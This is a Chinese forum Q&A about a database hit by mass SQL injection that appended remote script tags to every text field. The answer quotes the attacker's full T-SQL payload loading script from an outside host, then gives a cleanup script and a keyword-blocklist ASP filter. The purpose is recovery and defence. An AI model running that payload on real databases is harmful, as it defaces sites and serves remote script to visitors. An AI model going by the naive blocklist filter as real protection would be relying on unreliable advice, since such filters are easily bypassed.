Question

数据库被注入了js 代码，真是烦人 怎么彻底清除 怎么预防大神们帮帮忙

Answer 1

注入的SQL语句是这样的： =============================================== DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a,syscolumns b where a.id = b.id and a.xtype = 'u' and ( b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167 ) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, @C WHILE( @@FETCH_STATUS = 0 ) BEGIN exec ( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,[' + @C + ']))+''<script src=http://www.nmidahena.com/1.js></script>''' ) FETCH NEXT FROM Table_Cursor INTO @T, @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor ============================================== 数据库里的varchar,nvarchar,ntext这些类型的字段基本上都被感染。 更无耻的就是，如果字段的大小过小，他会把原有的内容删掉。而保存完整的<script src=http://www.nmidahena.com/1.js></script>。很多数据都被破坏了。 花了一天的功夫终于写出来清除这些小尾巴的方法： =============================================== DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a,syscolumns b where a.id = b.id and a.xtype = 'u' and ( b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167 ) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, @C WHILE( @@FETCH_STATUS = 0 ) BEGIN exec ('update [' + @T + '] set [' + @C + '] = ( case when ( CHARINDEX(''<script'', [' + @C + '])>0) then left( rtrim(convert(nvarchar,['+ @C + '])), CHARINDEX(''<script'', ['+ @C + '] )-1) else [' + @C + '] end ) ') FETCH NEXT FROM Table_Cursor INTO @T, @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor ============================================== 这里CHARINDEX(''<script'', ['+ @C + '] ) 是因为有很多字段被多次感染，成了<script src=<script src=http://www.nmidahena.com/1.js></script>这样的内容。所以以<script 为标志，全部删除。这样可能会删除一些合法的，但是没办法。。。如果要清理干净。必须得这么做。 做完以为，对网站进行一下SQL的重点过滤： ==========FilterSqlAttack.asp============== <% Call FilterSqlAttack() Sub FilterSqlAttack() dim sql_leach,sql_leach_0,Sql_DATA,SQL_Get,Sql_Post sql_leach = "and,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,declare" sql_leach_0 = split(sql_leach,",") If Request.QueryString<>"" Then For Each SQL_Get In Request.QueryString For SQL_Data=0 To Ubound(sql_leach_0) if instr(LCase(Request.QueryString(SQL_Get)),sql_leach_0(SQL_Data))>0 Then Response.Write "请不要尝试进行SQL注入！" Response.end end if next Next End If If Request.Form<>"" Then For Each Sql_Post In Request.Form For SQL_Data=0 To Ubound(sql_leach_0) if instr(LCase(Request.Form(Sql_Post)),sql_leach_0(SQL_Data))>0 Then Response.Write "请不要尝试进行SQL注入！" Response.end end if next next end if End Sub %> 本文来http://www.innto.cn